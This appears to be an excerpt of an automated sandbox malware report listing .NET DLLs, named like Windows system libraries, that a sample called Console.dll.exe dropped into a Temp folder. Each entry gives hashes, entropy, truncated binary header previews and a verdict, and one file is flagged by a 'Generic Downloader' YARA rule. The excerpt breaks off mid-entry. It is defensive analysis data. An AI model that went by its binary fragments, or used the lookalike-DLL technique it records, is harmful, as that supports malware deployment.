                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eD............!......... ....................@.................................c3....@.................................................t............(..........@...p...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                        Entropy (8bit):6.743479950126447
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:4GaxAsLW5o9WiGuWXebPpUNTQHnhWgN7acWIvrMqKDUX01k9z3Ae3N5z:+LLW5o9WiGTb2HRN7vRpR9zNd5z
                                                                                                                                                                                                                        MD5:E49A2124D00D45745BDEC9F9981BCAF3
                                                                                                                                                                                                                        SHA1:360B66FDAEF7420BF03E7DA43A4A5AD0CDD545D0
                                                                                                                                                                                                                        SHA-256:F0E4A7BE910D69F34A85EBDB8A2F3348C40A7E289FFB4602C2F7BAF96A2728AD
                                                                                                                                                                                                                        SHA-512:416D810DC591C647101208BD675B90CE31A862F0E29C2EF876330D27B612364F40B72EF2B897867AD0A01467C3A4D6B6397F25DDF33AD90029D8BAAD542D5908
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............(... ...@....... ..............................a!....`..................................(..O....@..4................)...`.......'..T............................................ ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P ......................D'......................................BSJB............v4.0.30319......l.......#~.. ...D...#Strings....d.......#US.h.......#GUID...x...|...#Blob......................3............................................................>...........i.....$...........T.....j.....9....................... .....R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):56184
                                                                                                                                                                                                                        Entropy (8bit):6.176478053101136
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:H/+4IBAKUcb+KRcuVLJq9rweB2mnzkVJorcwwMevekaHhXn80GT0g8T:m7ouR80eELVCwxmkaBXhGYxT
                                                                                                                                                                                                                        MD5:F672A537A363A4EEA79A48CF34FA5808
                                                                                                                                                                                                                        SHA1:B9101BA7E62B0116AC5A7D4064D91F684E25F233
                                                                                                                                                                                                                        SHA-256:B0B15EE123D24A220DC3446C96A6273E2FDADE71D1F352BF06217BDE57778B24
                                                                                                                                                                                                                        SHA-512:4ED8FB355723824C6E608B38D397C215142D508C80E5000DF854200DE8F89B44EB4AFE5829EA40F7706A6149527DBD8C748FF3AF9172D9A20B24958DD94E6484
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N............" ..0.................. ........... ....................... ......nL....`.....................................O.......................x#..............T............................................ ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........T...n..........$...(...L.........................................*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...( ...*.(....,!r...p......%...%...%...%...(....*....(!...*..,&(....,..r...pr...p.(....("...*..(#...*.*.(....,.r...p......%...%...(....*...($...*.(....,.r...p......%...%...%...(....*....(%...*.(....,"r...p......%...%...%...%....(....*......(&...

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.713334638039652
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:yUnaHtExAZgWuSWiIuWXebPpUNTQHnhWgN7acW/alyttuX01k9z3AWPoD9mGH:VaHtSQgWuSWiITb2HRN7Y9SR9zdPaFH
                                                                                                                                                                                                                        MD5:221D6DD5F1237CD247684CE8684547A3
                                                                                                                                                                                                                        SHA1:16F84A2CD719223A44B18A08761053887394B270
                                                                                                                                                                                                                        SHA-256:909AAF202BC5E504A5CE361EB6981073673037EE0A4273C166517DB6D56CD9E5
                                                                                                                                                                                                                        SHA-512:B66DDE626855E916AFE89320653745C651E673263B58BB3B93D2790691CC504F88053DA70216840CE11FAECCBB88EA2E180FB31BA33A68CA1F9BFFA7F509F0EA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V............" ..0..............*... ...@....... ..............................C.....`.................................M*..O....@..T................)...`......p)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...(...x...#Blob......................3......................................X.........U.............................y.....7.......k.................................u............. ...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Linq.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.697316901876271
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Asjc16T2BWx4WituWXebPpUNTQHnhWgN7acW1DYxNVAv+cQ0GX01k9z3ApyBE4n9:GDWx4WitTb2HRN7K8xNbZR9z3E4nWyN
                                                                                                                                                                                                                        MD5:C7324A1B65D79D69FF350FF9889BC3EE
                                                                                                                                                                                                                        SHA1:33CCD1C7BADCFB72F547B595F1AEA19688D69E55
                                                                                                                                                                                                                        SHA-256:C574D36ACCC9935DE551E988655EEAE702418A6E2CE4C9F003745CF5522AA8D0
                                                                                                                                                                                                                        SHA-512:BF10CFE54A99FF1229DB40433A534B568E3D6F8157CB986AE1B016253761D41485430DB9454F4DFC3EE2622B367AE81FDE76A501C6E37249E901576268363B0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............>+... ...@....... ..............................d7....`..................................*..O....@..T................)...`.......*..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................+......H.......P ..<....................)......................................BSJB............v4.0.30319......l...$...#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................L.............................p.@.....@.....,.....@.....@.....@.....@.....@...l.@.....@.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22192
                                                                                                                                                                                                                        Entropy (8bit):6.354869908401043
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:B1G5qkxK67ex4FCu1qWJAWi15kHRN7uHR9zkZqZd9Q:n6LdL9s9z6qZd9Q
                                                                                                                                                                                                                        MD5:0845E81793B8FE161B5E1BB06BEE3822
                                                                                                                                                                                                                        SHA1:2584632D78896AD4C22B1323DC421B5CEA8DB13F
                                                                                                                                                                                                                        SHA-256:46E0CEA3590B11AE2DE9C60D4DE0DF409CB92F95E30EC06A5938F78071D3AA20
                                                                                                                                                                                                                        SHA-512:06948058E11A770CEDE36BD850E5AD441F398A1ECA0CD875A3CF8A5488A7A57B3745C09345665A59FE7C464C5C3D8F0AFFAD2836EB4C295A98DAE673D23FA645
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0..$...........B... ........@.. ....................................`.................................wB..T....`...................(...........A..T............................................ ............... ..H............text...."... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................B......H........ ... ..................P ..........................................P...f...`...m..Q.km...|~..{...1..y..W.lL...(P......[...#9..Z..DY.2dc..?*..).......a!..E..d4we2.~.).P......_.......+.\.BSJB............v4.0.30319......`...|...#~......8...#Strings............#GUID...$.......#Blob......................3............................................................G..... .......b...-.....f.......i.......................................[...............................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Serialization.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16544
                                                                                                                                                                                                                        Entropy (8bit):6.621122049886203
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:E0YLW7fEqHWiqTb2HRN7J/6fR9zjglS1w:E0YkfEqG/iq9zfW
                                                                                                                                                                                                                        MD5:A2291DC87F8D68DEA872223F3F38CE7E
                                                                                                                                                                                                                        SHA1:052E5E1B7CC51CDA42B91E692996BCAB36DD9598
                                                                                                                                                                                                                        SHA-256:8517BAAF737BF94BA0B2318864D943B7984DD3C98138F89F4D43463865BAFB00
                                                                                                                                                                                                                        SHA-512:AFF341F5438D8BA135BF808A0DA0896C2D54B534AA2BB168A48717C079A13D6FE92299A8D2CA800BFCF4BB6AC2D1FE358219941640BCA8863CBCA6F6DE5188B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e4............" ..0.............N,... ...@....... ..............................r.....`..................................+..O....@...................(...`.......+..T............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................-,......H.......P ..8....................*......................................BSJB............v4.0.30319......l...4...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3......................................".....................X.................*._....._...B.?....._...'._...Y._....._...3._....._...l._.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XDocument.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.757688283492204
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:DLNzcxxWrIdWir93WT56Os1HnhWgN7aIWfaxQKrHbTseUfX01k9z3AcgkSKnU:DBWxWcdWik5kHRN7uKz/6fR9zjggU
                                                                                                                                                                                                                        MD5:CD012C0AEB66F1792AEAC74A3FF80683
                                                                                                                                                                                                                        SHA1:FCD63045B77122254AAB624A459EB2890F6CF467
                                                                                                                                                                                                                        SHA-256:CCA08E2D6C314DC026E04CD5E6909CF10CA5C320481447B9B905744B9BAE394D
                                                                                                                                                                                                                        SHA-512:10AD5FAD33C6F5743F70FB621AC4C9883FB89D2BE62E962EF4AA04ED2D272A548AA944848422881548AA26DC42A86FE9E1654784263325155B562F71D5169383
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../k..........."!..0..............+... ........@.. ....................................`.................................m+..N....@...................(...`.......*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P .......................................7.A0q...r..g~DY......k......&.8EL."...:J...../H^v.j.\1...<....0...p..y...EW!.(..I ...X^J...G.....w.5..%....,....(.......].BSJB............v4.0.30319......`.......#~..d.......#Strings............#GUID...$.......#Blob......................3................................................L.............................p.L.....L.....8.....L.....L.....L.....L.....L...l.L.....L.............................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):30880
                                                                                                                                                                                                                        Entropy (8bit):4.256936828210995
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:X+WieWiiUVDJZuzQxgPuWXebPpUNTQHnhWgN7aIWT8KIjwX01k9z3ADZ7U1dPB:X+WieWiiFKgPTb2HRN7mJHR9zkZMdPB
                                                                                                                                                                                                                        MD5:8C60A6C28353AB7AD8234044C232556B
                                                                                                                                                                                                                        SHA1:2C95A797F01C1F7390D288FC7C9A38CA247F73AA
                                                                                                                                                                                                                        SHA-256:C5AC54C1960E68DB6B80FDB9BE69AE5D1AC2A027B0C006F8DA471E0ED5B61E0D
                                                                                                                                                                                                                        SHA-512:CD1FAEC38C8AD6CE991E2939EDD1729D4B0B9E0EDCB8186D64111D72FB97392495DD7AA316D7746A6F658F239FF42893CA7534244BFC2B9653B12B77B0D7BA06
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.............!..... ... ...............0....@..........................P.......(....@..........................................................P...(...@..$...`...p...............................................................H............text............ .................. ..`.data........0.......0..............@....reloc..$....@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16160
                                                                                                                                                                                                                        Entropy (8bit):6.73184648753224
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:1CA6iAvxWIvWiBA5kHRN7ckXC4deR9zZjmNEr0z:RsvNFVckXC4dC9zZjyNz
                                                                                                                                                                                                                        MD5:CEBE1A4A8B9AC3B59C42566109EE849B
                                                                                                                                                                                                                        SHA1:06D375D8F1F94A4589A32163C06B847220E05CB5
                                                                                                                                                                                                                        SHA-256:88E5E770CE5886C10315FEA63CBCF6F0CEEEF0149B8D2BA279FEE7B01EF33F74
                                                                                                                                                                                                                        SHA-512:5AE647B8D728E6ECE451CF3C9F16A2F7744B1BF4D0EBB03F17371564202DF3DA125D76F111BC7F6F6448FD06FE955D9B06E4B46CF4C89BF5D1E6A465FF7A4124
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e............"!..0..............*... ........@.. ...............................9....`..................................*..N....@..d............... )...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................*......H........ ......................P .........................................]....&>.X..I..=......(...."xd.R.&..d..ue0W..7.E...$`..D..z.@0.@.L!...V.."..~b.C9.D.i.r.(...H..3.0.....~H...o.I.x..)\..E.ZBSJB............v4.0.30319......`.......#~......\...#Strings....P.......#GUID...`.......#Blob......................3......................................'.........C.............................g.{...%.{.....d.....{...|.{.....{.....{.....{...c.{.....{.............................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.758774850355361
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:BYlxlVxAdUc14WA1nPUWiOuWXebPpUNTQHnhWgN7acWX0YyttuX01k9z3AWPoD9H:6TfodiWmsWiOTb2HRN7jSR9zdPah
                                                                                                                                                                                                                        MD5:9E484CD164107ECE293EA413787796C7
                                                                                                                                                                                                                        SHA1:A8BB43C0AC577A1543E33B61FE5BC067100C9037
                                                                                                                                                                                                                        SHA-256:67E23C0806076A00C00525B29DBA53208717B15B157025E3AE6E3CDEF1AD6BB4
                                                                                                                                                                                                                        SHA-512:521C0FD08631C782080DCDF22B8830A226C09B881BB4B96FFC64D32879C8BF5B4666FB661639645D25BB81D1CF330660077471D732C5B4D31E6CB0E8E3473D5A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(..........." ..0..............+... ...@....... ...............................2....`.................................A+..O....@...................)...`......T*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................u+......H.......P .......................)......................................BSJB............v4.0.30319......l.......#~..8.......#Strings............#US.........#GUID...........#Blob......................3................................................P.................<...........g.~...2.~.....1.....~.....~.....~.....~.....~...p.~.....~.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                        Entropy (8bit):6.625487203475341
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:rw3anBNTXxz+WAvWi6uWXebPpUNTQHnhWgN7acWCKDUX01k9z3AeEh:M3afBCWAvWi6Tb2HRN7BpR9zNW
                                                                                                                                                                                                                        MD5:7FEC2CB54AC56E0FE3D8BCC93D151E64
                                                                                                                                                                                                                        SHA1:B49EAF45EB6D12436A694C61050CBCE2EAB68613
                                                                                                                                                                                                                        SHA-256:0093AB9076C483398D0A0D7CBAA454F5BA3B677DC7C03C269056653DBE9A31A3
                                                                                                                                                                                                                        SHA-512:06408E3290308A2455013ED14D2F561FAA0F8F63863FBE96FDE20CCF6D2B1D858E06B99DAB699EBB18E4E484D16AAC20CD55A599931B69D221AC317582FD8D3F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M............"!..0.............N3... ........@.. ...................................`..................................2..V....@...................)...`.......2..T............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................03......H........ ..0...................P .......................................E{..^.\....I..........n....dt-P&r.:.......9.^G....p.dG..'..O...D#.ZC..R^...t..!.".`..\.f......@.......[..{..J.%..H..J.BSJB............v4.0.30319......`.......#~.. ...p...#Strings............#GUID...........#Blob......................3................................J.................................+.....F.....H.....N...............................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23816
                                                                                                                                                                                                                        Entropy (8bit):6.28194581000974
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:p58Ieq5ufyw8bcB8yG5sW+jsWit9Tb2HRN732p0SR9zdPaYc:p58IeWvAW9/iw0e9zBHc
                                                                                                                                                                                                                        MD5:41D47C1949D1CC781FE749FEB258F898
                                                                                                                                                                                                                        SHA1:7F889BD6B11F8C2092A4259E35B67FF332EF96FB
                                                                                                                                                                                                                        SHA-256:48822FF78B7D2CE06B76EBA6100CA546AF00C7004CCE325BC12385806F731A0C
                                                                                                                                                                                                                        SHA-512:F85614F02C303CFAC46111F98BB14516C048FC22C0F65D8700A8FC094808B5499A156C4515ADB249003781BDA07BA603FAD7B518887FD7C89E8829F841F2657C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... F............" ..0..*...........I... ...`....... ....................................`..................................H..O....`..4............4...)...........H..T............................................ ............... ..H............text...4)... ...*.................. ..`.rsrc...4....`.......,..............@..@.reloc...............2..............@..B.................I......H.......P ..4'...................G......................................BSJB............v4.0.30319......l...x...#~......X...#Strings....<%......#US.@%......#GUID...P%......#Blob......................3..................................................................S.....:.y...<.....O...................................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50336
                                                                                                                                                                                                                        Entropy (8bit):5.746059228199323
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:JRlKhT46UA2Zi5wRNH5JVb0U502zq1TntuIB3/iKq9z3:Tu6Zi5i5jzCkINiKWz3
                                                                                                                                                                                                                        MD5:34E70D627DC45537F82D5BFA7D23350F
                                                                                                                                                                                                                        SHA1:D8A17E848188290365003938C2AB4D4597FD0DB4
                                                                                                                                                                                                                        SHA-256:D2470B1ADBF77789919DC9525203E32AB78551B6DAE8B8A8C620E68FA6579C99
                                                                                                                                                                                                                        SHA-512:F364F0A7CD5DE84DAA7845343D64D9EC70D499B68268EE887F701DF2D5FA15C223B158E055C0674D747502EFD880318AC5AE23CC3B3291A1FF3358D47EEAD5D3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll, Author: Joe Security
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9..........." ..0................. ........... ...............................S....`.....................................O........................(..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......P .....................4.......................................BSJB............v4.0.30319......l....:..#~..d;..dR..#Strings...........#US........#GUID..........#Blob......................3............................-......................=..\..=.....=...=............; ..2.; ..T.M.....m=....m=....; ..9.; ....; ....; ....; .. .; ..P.; ................};....};....};..).};..1.};..9.};..A.};..Q.}; .Y.};..a.};..i.};..q.};..y.};....};....};......[.....d.........#.....+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WebSocket4Net.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                                                                        Entropy (8bit):5.8888244673369075
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:MoNIglS4xUF/NWN2MPilIlLIoSBlNcIguQM1:MMIh4yNlINIoSWIguV
                                                                                                                                                                                                                        MD5:4CE1BFB17E847FEB3E7ECF1CC33DF731
                                                                                                                                                                                                                        SHA1:3E48D0F7F5CD8A618D2F32C6AA08CFF0C3C61C49
                                                                                                                                                                                                                        SHA-256:BBAF622CC3F4B512C6C131AB7CCAD2DB6B0662C03367AFC10F1AAB3DEFF5EFCB
                                                                                                                                                                                                                        SHA-512:1E2723F0C10720D0491E0EFE1ED7D123DB94AE8EAA8F3C82771502BB10FD0392096578AE360CA308735CE319D37EFEAD6713D12C8B24CB8209280F5E470C5DA8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............j.... ... ....... .......................`......w.....@.....................................O.... .......................@......l...8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................L.......H.......Ho................................................................{....*"..}....*..{....*"..}....*V.(......(......(....*:.(......(....*..{....*"..}....*Z...o....&.~....o....&*Z...o....&.~....o....&*V..o....&.~....o....&*6.~....o....&*...0...........~....Q..~......s.....8.....P(....,...Q8.....r...po....,..(....-&....o....-..*.....o ...(!...o"...8......:o#........?........o$.......(....-...o .........Xo%.......(....-"..r...po....,...o&....1....o%.......(....-1.....o....

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WindowsBase.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                        Entropy (8bit):6.718860348929332
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:+yCmaITFWQlMXD2EgWtcWiZuWXebPpUNTQHnhWgN7acW3+yttuX01k9z3AWPoD90:pasFWQFWtcWiZTb2HRN7S/SR9zdPaPu
                                                                                                                                                                                                                        MD5:4A8C708988250C39E6F24D84EB8A2768
                                                                                                                                                                                                                        SHA1:C7993AF266A660576B1934BF8A9ACE287A969C97
                                                                                                                                                                                                                        SHA-256:CCC047A00465ED02571D58448BD9DAF4FE477BA73251632352347940995C9D3E
                                                                                                                                                                                                                        SHA-512:2356858091F449E63E9A72520D9D93E9146E605EDED39BFAA1D1C3239E9C28D54CB78B29A04F332A93088302CAC0AE7A55F0014421CDA2A5D0FD43EBD2B306B3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nhq..........." ..0..............-... ...@....... ....................................`.................................O-..O....@..4................)...`......x,..T............................................ ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l...p...#~......8...#Strings............#US.........#GUID...(.......#Blob......................3................................................................................r.....r...Q.(...g.r...6.r.....r.../.r...L.r.....r.....r..... ...........u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u...y.u.......................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\mscorlib.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59664
                                                                                                                                                                                                                        Entropy (8bit):5.646827579317504
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:itFcC3ZcYf5o4bZyGc1A4c4biIC4dezJN8:itOcZcYi4b8lptIL8
                                                                                                                                                                                                                        MD5:5D78956E375E7BF40CE3787C36EC20A3
                                                                                                                                                                                                                        SHA1:3219234855A038E9E54F7A7502C2E9C7A8158E32
